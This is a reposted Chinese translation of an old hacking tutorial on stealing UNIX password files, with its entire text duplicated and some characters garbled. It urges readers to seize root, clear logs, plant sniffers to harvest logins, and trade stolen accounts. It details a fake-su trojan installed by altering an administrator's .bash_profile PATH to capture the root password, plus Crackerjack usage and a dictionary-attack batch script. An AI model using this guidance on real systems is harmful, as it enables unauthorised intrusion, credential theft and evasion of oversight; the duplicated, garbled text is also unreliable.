从UNIX系统获取密码档(二)
网络安全 2021-07-03 10:05www.168986.cn网络安全知识
主题
破解(Cracking)passwrd 文档
与新手交谈
困难的方法
利用mount命令获取访问权限
有很多方法可以获得一个起始帐号.我将深入每个方面帮助你开始.你所需的只是一个好的帐号,用来获得数百个帐号.想一想这你进入一个很好的可以利用的系统(大多是Linux机器;),夺取root权限并装上一个Sniffer(嗅探器);这个TCP sniffer 将监测到网络上任何login(登陆)过程并记录下所有Tel,Ftp或拨号进出的Login 名和口令;这样即使是一个小以太网你也可获得大约100个口令,如果是一个更大的网络供应商你就会得到全世界的数百个帐号!这一切,你只要有某个可利用系统的一个好帐号和口令就可做到!如果你看起来无法利用某系统的root权限,那就拿它来破解口令,用来和那些但没有shell帐号或磁盘空间的其他hacker及IRC使用者交换.决不要把一个你有root权限的系统的口令给出去!你自己留着它!
OK,让我们开始深入获取你的第一个帐号的方法.Go!
--------------------------------------------------------------------------------
破解passwd 文档
如果你是按照心中正确的框架去hacking的话,一般都是先运行破解程序直到得到一个可以进入此系统的好帐号.然后Login上去看看能否夺取系统的root权限.如果可以,拿了root,移取用得着的文档到你的子目录里,抹去你的在场痕迹,清除所有日志.这样就准备好可以安装Sniffer了.
为何要去破解那些只用24小时就可破解出大部分口令的系统?我们的目的不仅仅是正在hack的机器,还有那些与之相连的机器.如果某系统没有利用价值,不要在它上面浪费时间,去寻找下一个目标.后注如果你仅仅是为了得到上面所说的交换帐号的口令那又另当别论.
得到一个管理员的帐号后,你可能会想读一读他的历史文档,看看他是否曾用过SU命令成为root.如果有,你就可以用SU特洛伊木马帮你夺取root口令.它如此工作你更改他(管理员)的Shell脚本使得一隐藏目录(.term)被很好安置在搜寻路径里所有目录之前.把伪SU程序放在该.term(或其他)目录里.他键下SU,对他来说一切都如常,在提示下他键入root口令,然后口令就悄悄地被拷贝到/tmp/.elm69的log文档里,删除伪SU文件,并返回一个摽诹畲頂的信息让他再试一次.管理员一定认为是他输入错了,便运行SU,但这回是真的SU了.
在后面的uuencode过的附录里,你可找到假SU程序.
这是DOC文档
Fake SU by Nfin8 - i-e
IRC: /msg i-e
Easy as 1,2,3 ...
1.更改路径到你已有访问权限的用户帐号上,此前你应已从历史文档中看到他曾用过SU命令;先建立放SU特洛伊程序的目录.最好是.term或.elm.
2.确定已编辑过su.c的头部指向你所用路径,使得SU特洛伊可自我删除并在第二次尝试让真SU程序运行.
3.把所有文件放进目标目录,并编译su.c.
g su.c -o su
然后删除SU以外的所有文件.一切搞定!
.bash_profile 结构如下
# .bash_profile
# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
# User specific environment and startup programs
PATH=$PATH:$HOME/bin
ENV=$HOME/.bashrc
USERNAME=""
export USERNAME ENV PATH
把第一行改为PATH=$HOME/.term:$PATH:$HOME/bin
当系统管理员运行SU时,就会先运行在.term里的SU特洛伊然后报告口令出错.SU特洛伊程序会在/tmp目录创建包含键入的root口令(或帐户口令)的隐藏文件.如果是非root帐户,它还记录帐户名.然后SU特洛伊自我删除使得下次尝试将运行真正的SU程序.
你可在/etc目录下的passwd文档前部找到管理员的用户名.只需打more passwd
你可确信passwd文档的头一二个帐户就是管理员的,虽然有时你也能找到其他人的目录如/staff/username.
历史文档在每个用户目录里.通过阅读它们,你可看到该用户最近使用过的命令,有时能看到最近的100多个命令.寻找.bash_history或history文件,你可用more命令读它们more .bash_history,也可more .b或more .b(然后按键盘上的Tab键).
OK,现在你需要一个好的password破解程序.下一章你可看到在没有帐号时如何从系统夺取password文档.it is catch 22(我不懂了?译者),你还是要用到password破解程序.
你需要下列三样东东
1. Password破解程序
2. 好的字典档
3. Password 文档
初学者最好的password破解程序当数Crackerjack,搜寻Web页可以很容易找到它.Down下来准备开始.如果你已有所入门,可down一个unix版本的Cjack并在shell环境下运行它.但如你是初学,down一个DOS/OS/2版本好了.
还要找一些好字典档.最好的字典档就是名字(names)了.你会在网络上发现最不可靠的口令如男孩的女友名,女孩的男友名啦)象如'familynames' 'babynames' 'girlsnames' 'boysnames' 'monpasswords'’ hackersdict’这样为名的字典档是最好的.
装载crackerjack如[D:\jack]jack
Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark
PWfile(s) : domain..passwd
Wordfile : domain..passwd
上面把password文档作为字典档.这会让你先找出那些用登陆名(Login name)作口令的用户,如果用真名(real name )或公司名之类的信息的话,也能马上猜中.这样你就不用苦苦等候程序搜索整个字典档了.
如果想hash(我译做扩充)字典档以得到更多的词量,可参读crackerjack的DOC文档.
所谓hashing(扩充)就是你可告诉crackerjack更改字典档中的词例如在单词的前后加一些数字或字母,就象sandy1或1sandy.你会发现很多用户这样做并以为这更可靠.
狼蚁网站SEO优化就是为口令文档和字典档写的hashing文件.通过观察它们,你就会明白你如何修改它们或创建新的hashing文件以满足自己的需要.
------------ start of dicthash.bat
@echo off
cls
echo - THIS FILE FOR DOS MACHINES
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your dict and
echo - password file. Then use this batch file using the following format:
echo -
echo - dicthash.bat dictfilename.ext passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - dicthash will first load jack running the dict file against your
echo - password file in both cases, then it will add numbers 0-9 both to
echo - the begining and end of every dict word. This will take a while,
echo - so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.
echo -
echo - Mail me some of your hits, let me know how this works for you ;)
jpp -lower %1 | jack -stdin %2
jpp %1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
破解(Cracking)passwrd 文档
与新手交谈
困难的方法
利用mount命令获取访问权限
有很多方法可以获得一个起始帐号.我将深入每个方面帮助你开始.你所需的只是一个好的帐号,用来获得数百个帐号.想一想这你进入一个很好的可以利用的系统(大多是Linux机器;),夺取root权限并装上一个Sniffer(嗅探器);这个TCP sniffer 将监测到网络上任何login(登陆)过程并记录下所有Tel,Ftp或拨号进出的Login 名和口令;这样即使是一个小以太网你也可获得大约100个口令,如果是一个更大的网络供应商你就会得到全世界的数百个帐号!这一切,你只要有某个可利用系统的一个好帐号和口令就可做到!如果你看起来无法利用某系统的root权限,那就拿它来破解口令,用来和那些但没有shell帐号或磁盘空间的其他hacker及IRC使用者交换.决不要把一个你有root权限的系统的口令给出去!你自己留着它!
OK,让我们开始深入获取你的第一个帐号的方法.Go!
--------------------------------------------------------------------------------
破解passwd 文档
如果你是按照心中正确的框架去hacking的话,一般都是先运行破解程序直到得到一个可以进入此系统的好帐号.然后Login上去看看能否夺取系统的root权限.如果可以,拿了root,移取用得着的文档到你的子目录里,抹去你的在场痕迹,清除所有日志.这样就准备好可以安装Sniffer了.
为何要去破解那些只用24小时就可破解出大部分口令的系统?我们的目的不仅仅是正在hack的机器,还有那些与之相连的机器.如果某系统没有利用价值,不要在它上面浪费时间,去寻找下一个目标.后注如果你仅仅是为了得到上面所说的交换帐号的口令那又另当别论.
得到一个管理员的帐号后,你可能会想读一读他的历史文档,看看他是否曾用过SU命令成为root.如果有,你就可以用SU特洛伊木马帮你夺取root口令.它如此工作你更改他(管理员)的Shell脚本使得一隐藏目录(.term)被很好安置在搜寻路径里所有目录之前.把伪SU程序放在该.term(或其他)目录里.他键下SU,对他来说一切都如常,在提示下他键入root口令,然后口令就悄悄地被拷贝到/tmp/.elm69的log文档里,删除伪SU文件,并返回一个摽诹畲頂的信息让他再试一次.管理员一定认为是他输入错了,便运行SU,但这回是真的SU了.
在后面的uuencode过的附录里,你可找到假SU程序.
这是DOC文档
Fake SU by Nfin8 - i-e
IRC: /msg i-e
Easy as 1,2,3 ...
1.更改路径到你已有访问权限的用户帐号上,此前你应已从历史文档中看到他曾用过SU命令;先建立放SU特洛伊程序的目录.最好是.term或.elm.
2.确定已编辑过su.c的头部指向你所用路径,使得SU特洛伊可自我删除并在第二次尝试让真SU程序运行.
3.把所有文件放进目标目录,并编译su.c.
g su.c -o su
然后删除SU以外的所有文件.一切搞定!
.bash_profile 结构如下
# .bash_profile
# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
# User specific environment and startup programs
PATH=$PATH:$HOME/bin
ENV=$HOME/.bashrc
USERNAME=""
export USERNAME ENV PATH
把第一行改为PATH=$HOME/.term:$PATH:$HOME/bin
当系统管理员运行SU时,就会先运行在.term里的SU特洛伊然后报告口令出错.SU特洛伊程序会在/tmp目录创建包含键入的root口令(或帐户口令)的隐藏文件.如果是非root帐户,它还记录帐户名.然后SU特洛伊自我删除使得下次尝试将运行真正的SU程序.
你可在/etc目录下的passwd文档前部找到管理员的用户名.只需打more passwd
你可确信passwd文档的头一二个帐户就是管理员的,虽然有时你也能找到其他人的目录如/staff/username.
历史文档在每个用户目录里.通过阅读它们,你可看到该用户最近使用过的命令,有时能看到最近的100多个命令.寻找.bash_history或history文件,你可用more命令读它们more .bash_history,也可more .b或more .b(然后按键盘上的Tab键).
OK,现在你需要一个好的password破解程序.下一章你可看到在没有帐号时如何从系统夺取password文档.it is catch 22(我不懂了?译者),你还是要用到password破解程序.
你需要下列三样东东
1. Password破解程序
2. 好的字典档
3. Password 文档
初学者最好的password破解程序当数Crackerjack,搜寻Web页可以很容易找到它.Down下来准备开始.如果你已有所入门,可down一个unix版本的Cjack并在shell环境下运行它.但如你是初学,down一个DOS/OS/2版本好了.
还要找一些好字典档.最好的字典档就是名字(names)了.你会在网络上发现最不可靠的口令如男孩的女友名,女孩的男友名啦)象如'familynames' 'babynames' 'girlsnames' 'boysnames' 'monpasswords'’ hackersdict’这样为名的字典档是最好的.
装载crackerjack如[D:\jack]jack
Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark
PWfile(s) : domain..passwd
Wordfile : domain..passwd
上面把password文档作为字典档.这会让你先找出那些用登陆名(Login name)作口令的用户,如果用真名(real name )或公司名之类的信息的话,也能马上猜中.这样你就不用苦苦等候程序搜索整个字典档了.
如果想hash(我译做扩充)字典档以得到更多的词量,可参读crackerjack的DOC文档.
所谓hashing(扩充)就是你可告诉crackerjack更改字典档中的词例如在单词的前后加一些数字或字母,就象sandy1或1sandy.你会发现很多用户这样做并以为这更可靠.
狼蚁网站SEO优化就是为口令文档和字典档写的hashing文件.通过观察它们,你就会明白你如何修改它们或创建新的hashing文件以满足自己的需要.
------------ start of dicthash.bat
@echo off
cls
echo - THIS FILE FOR DOS MACHINES
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your dict and
echo - password file. Then use this batch file using the following format:
echo -
echo - dicthash.bat dictfilename.ext passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - dicthash will first load jack running the dict file against your
echo - password file in both cases, then it will add numbers 0-9 both to
echo - the begining and end of every dict word. This will take a while,
echo - so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.
echo -
echo - Mail me some of your hits, let me know how this works for you ;)
jpp -lower %1 | jack -stdin %2
jpp %1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
1
上一篇:软件破解新手进化篇
下一篇:从UNIX系统获取密码档(三)
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座